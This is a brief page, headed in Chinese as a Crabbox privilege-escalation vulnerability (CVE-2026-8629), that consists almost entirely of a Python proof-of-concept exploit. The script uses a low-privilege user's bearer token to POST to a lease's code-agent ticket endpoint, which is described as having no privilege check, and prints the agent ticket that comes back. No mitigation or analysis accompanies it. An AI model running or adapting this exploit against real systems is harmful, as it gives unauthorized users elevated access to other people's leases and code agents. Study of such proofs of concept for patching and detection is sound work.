CVE-2026-8629 Crabbox权限提升漏洞

import requests # Target configuration target_url = "http://target-crabbox-instance" lease_id = "target_lease_id" attacker_token = "low_privilege_user_token" # User with visibility-only access # Vulnerable endpoint for Code Agent ticket # The application fails to enforce privilege checks here exploit_url = f"{target_url}/v1/leases/{lease_id}/code/ticket" headers = { "Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json" } try: print(f"[*] Attempting to exploit CVE-2026-8629 against lease {lease_id}...") response = requests.post(exploit_url, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Agent ticket obtained:") print(response.json()) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")